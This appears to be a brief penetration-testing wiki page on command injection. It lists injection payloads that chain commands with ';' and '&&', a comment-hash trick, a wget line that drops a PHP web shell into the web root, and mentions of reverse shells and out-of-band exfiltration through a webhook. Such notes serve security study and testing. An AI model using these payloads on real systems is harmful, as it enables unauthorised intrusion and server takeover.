Command Injection

When a web app takes input from an user and executes a command on the host, this can be exploited to run arbitrary commands unless properly sanitized and protected.

When attempting command injection, we need to think about how the command is being run. We can possibly chain commands with the ; or && operators:

; whoami;
&& whoami;
&& wget [shell file] > /var/www/html/shell.php;
# A hash can sometimes clear out commands after the injetion
123)^2))}';whoami;#

Viewing source can sometimes provide a better format than what may be output for you

Use this to find out what is available to you for creating a reverse shell

Out of Bounds Technique

This is when we need to send information to another area - such as adding a command in backticks to a webhook url and reviewing the data after it runs. We can sometimes use things like a newline separator to run these commands as well \n

PreviousXSS NextLocal File Inclusion

Last updated 2 hours ago